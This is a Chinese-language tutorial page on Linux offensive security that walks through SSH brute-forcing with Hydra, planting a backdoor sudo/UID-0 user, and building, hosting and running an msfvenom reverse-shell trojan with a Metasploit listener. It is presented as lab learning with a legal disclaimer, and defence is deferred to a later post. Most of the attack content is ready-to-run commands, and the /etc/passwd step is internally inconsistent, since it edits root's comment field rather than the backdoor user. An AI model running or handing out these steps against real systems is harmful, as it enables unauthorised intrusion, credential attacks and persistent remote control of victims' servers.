当前位置: 首页 > news >正文

Linux实战攻防:从SSH渗透到木马控制

在上篇中,我们掌握了 Linux 的基础操作、权限管理和系统配置,而 Linux 作为网络攻防的 “主战场”,核心价值体现在实战攻防中。本篇将从网安实战角度,讲解 Linux 核心攻防场景:SSH 服务攻防与木马入侵让你能从攻击者视角实现渗透控制。

一、实战前提:为什么 Linux 是网安核心?

  1. 市场占比:全球 80% 以上的服务器使用 Linux 系统,攻击服务器的破坏和影响远大于个人电脑;
  2. 实战场景:真实网络攻防中,Linux 是主流目标,掌握 Linux 攻防是网安从业者的必备技能;
  3. 系统特性:开源透明、权限严格、命令行操作灵活,既为攻击者提供了渗透空间,也为防御者提供了丰富的加固手段。

本次实战基于Kali Linux(攻击机)Ubuntu/CentOS(目标机),所有操作均为合法学习用途,未经授权禁止对他人系统进行测试,遵守《网络安全法》。

二、SSH 服务攻防:远程控制的核心战场

SSH 协议是 Linux 远程管理的核心(类似 Windows 的 RDP),支持跨地域远程控制服务器,也是攻击者的首要渗透目标 —— 拿下 SSH 权限,就相当于掌握了目标服务器的 “大门钥匙”。

1. 先搭环境:SSH 服务安装与配置

以 Ubuntu(Debian 系列)为例,完成 SSH 服务的基础配置,RedHat 系列(CentOS)操作逻辑一致,包管理器换为 yum 即可。

步骤 1:切换到 root 用户(需最高权限)

sudo su

步骤 2:安装 SSH 服务

apt install openssh-server

步骤 3:修改 SSH 配置文件(允许 root 远程登录 + 密码认证)

nano /etc/ssh/sshd_config

找到以下配置项,删除 #注释并修改:

PermitRootLogin yes # 允许root用户远程登录

PasswordAuthentication yes # 允许密码认证

修改完成后,按Ctrl+XY→回车保存退出。

步骤 4:重启 SSH 服务使配置生效

service ssh restart

远程连接测试:Xshell/CRT

打开远程连接工具,输入目标机 IP,端口 22,输入 root 账号密码,连接成功即表示 SSH 环境搭建完成。

2. SSH 攻击实战:漏洞排查 + 暴力破解

攻击者拿下 SSH 权限的核心方式之一是暴力破解,利用工具批量尝试密码组合,破解弱口令,前提是目标机开启密码认证、且密码复杂度低。

(1)漏洞排查

先查询 SSH 版本,判断是否存在历史漏洞,若版本无漏洞,则转向暴力破解:

(2)暴力破解:Hydra 工具(Kali 自带)

Hydra 是开源密码破解工具,支持 SSH、FTP 等多种协议,核心原理是读取密码字典,批量尝试登录

核心命令:hydra -l 用户名 -P 密码字典路径 ssh://目标机IP

实操示例:hydra -l root -P pass.txt ssh://192.168.20.148

3. 权限维持:植入后门用户

破解 SSH 密码后,为避免目标用户修改密码导致失去控制权,攻击者会植入后门用户,实现长期控制,核心步骤:

步骤 1:创建后门用户并设置密码

useradd -m hack # 创建hack用户,-m自动创建用户目录

passwd hack # 给hack设置密码

步骤 2:配置 sudo 权限(让普通用户拥有 root 权限)

nano /etc/sudoers

找到root ALL=(ALL:ALL) ALL,并在下面添加:hack ALL=(ALL:ALL) ALL

保存退出后,hack 用户即可通过sudo 命令执行 root 权限操作。

步骤 3:进阶操作:设置用户为超级用户(UID=0)

修改/etc/passwd文件,将 hack 用户的 UID 改为 0,使其拥有和 root 完全相同的最高权限:

使用nano /etc/passwd

找到 root:x:0:0:root:/root:/bin/bash,修改为: root:x:0:0:hakc:/root:/bin/bash

三、木马入侵检测:长期控制的核心手段

拿下 SSH 权限后,攻击者会通过植入木马实现对目标机的长期隐蔽控制,让目标机成为 “肉鸡”,可随时执行命令、窃取数据。本次实战使用 Kali 自带的MSF 框架制作 Linux 木马,完成入侵与权限维持。

1. 木马核心概念

木马是伪装成合法软件的恶意程序,具备隐蔽性和控制性,与向日葵等正规远程工具的核心区别:用户不知情、后台隐蔽运行,危害是让目标机被攻击者远程操控,成为网络攻击的跳板。

2. 木马攻击三步骤:制作→植入→启动

步骤 1:制作 Linux 木马(MSFvenom 工具)

MSFvenom 是 MSF 框架的木马生成工具,生成反向连接木马(目标机主动连接攻击机,绕过防火墙),核心命令:

msfvenom -p linux/x64/shell/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f elf -o shell.elf

  • -p:指定木马载荷(linux/x64/shell/reverse_tcp 为 Linux64 位反向 shell);
  • LHOST:攻击机 IP(Kali 的 IP);
  • LPORT:攻击机监听端口(自定义,如 9999,未被占用即可);
  • -f elf:指定木马格式为 Linux 可执行文件;
  • -o:指定木马输出名(如 shell.elf)。

执行成功后,当前目录会生成shell.elf木马文件。

步骤 2:攻击机启动监听(MSFconsole)

启动 MSF 控制台,配置监听模块,等待目标机木马连接,核心命令:

# 启动MSF控制台 msfconsole

# 选择多处理模块 use exploit/multi/handler

# 设置与木马一致的载荷 set payload linux/x64/shell/reverse_tcp

# 设置监听IP(攻击机IP) set lhost IP

# 设置监听端口(与木马一致,9999) set lport 9999

# 启动监听 run

步骤 3:将木马植入目标机并启动

通过 SSH 权限,将攻击机的木马文件传输到目标机,核心方式:Apache 服务提供下载,目标机 wget 下载

攻击机操作:开启 Apache 服务,共享木马

# 将木马移动到Apache网页根目录 mv shell.elf /var/www/html

# 启动Apache服务 service apache2 start

目标机操作:通过 wget 下载木马

# 从攻击机下载木马,保存为shell.elf wget http://攻击机IP/shell.elf -O shell.elf

解决权限问题,启动木马

目标机下载的木马默认无执行权限,需添加执行权限后启动:

# 添加执行权限 chmod +x shell.elf

# 启动木马 ./shell.elf

木马启动后,攻击机的 MSF 控制台会成功建立会话,此时攻击者即可在 MSF 中执行任意 Linux 命令,完全控制目标机。

上述介绍了SSH 服务攻防与木马入侵,知道了如何攻击那么下篇我们将进入Linux 网络安全的系统安全加固,教你如何防御。

http://www.jsqmd.com/news/514699/

相关文章:

  • 贴片电阻丝印识别全指南:三位码、四位码、R码与E96编码解析
  • TensorFlow 2.15避坑指南:5个新手部署常见问题与一键解决
  • 从原理到实践:Halcon中矩形顶点坐标计算的数学推导与优化技巧
  • 2026给排水拉管施工服务推荐榜重资质经验:定向钻施工/小口径顶管施工/市政拉管施工/拉管施工价格/拉管施工原理/选择指南 - 优质品牌商家
  • 达梦数据库实战:如何高效管理用户权限与表空间(附常见问题解决方案)
  • 注入活人感降AI是什么意思?学会这个技巧AI检测直接过
  • RexUniNLU常见问题解决:模型加载慢、内存不足怎么办?
  • Valgrind避坑指南:从‘Conditional jump depends on uninitialised value‘到内存泄漏分类的完整解析
  • 智能医疗设备电机品牌推荐:无框电机、机器人关节电机、机器人电机、水下电机、电机定制、直流伺服电机、直流减速电机选择指南 - 优质品牌商家
  • Matlab小波变换实战:如何用dwt2()函数一键分解图像高频低频成分(附完整代码)
  • 终于有人把 AI Agent Skill 开发流程整明白了——Anthropic skill-creator 实战解读
  • [特殊字符]发现宝藏!这款开源简历编辑器太绝了✨
  • CHORD-X辅助教学应用:基于作业批改理念的战术动作AI评估
  • Navicat Premium 12 破解激活全攻略:一劳永逸的解决方案
  • 开源项目管理工具选型指南(2026年最新)
  • Nunchaku-flux-1-dev显存优化解析:RTX 3090/4090低显存稳定运行教程
  • 红外遥控硬件设计与NEC协议解码实战
  • Git Bash 详细配置+ComfyUI 开源仓库安装:从地狱到天堂、惆怅变快乐、沮丧转开心,我花了一晚上
  • HJ139 小红的01子序列计数(hard)
  • Transformer代码实现2:手搓词嵌入层和位置编码
  • Phi-3-vision-128k-instruct在嵌入式视觉系统中的角色与通信协议设计
  • adb微信降级(无需root)
  • YOLOFuse实战指南:如何训练自己的RGB+红外数据集
  • XSS-Labs靶场通关秘籍:从入门到精通的20种绕过技巧
  • yz-bijini-cosplayGPU算力优化:RTX 4090显存碎片治理与CPU卸载实践
  • Halcon实战:巧用emphasize算子提升工业视觉检测清晰度
  • FPGA远程烧录bit流的实现与优化
  • Chrome 119+ 新功能实测:鼠标悬停就能看哪个标签页在“吃”内存,附省电模式设置技巧
  • 3步打造ESP32物联网环境监测系统:嵌入式开发者的终极指南
  • Qwen3.5-9B交通管理:道路图像分析+拥堵预测+调度建议生成系统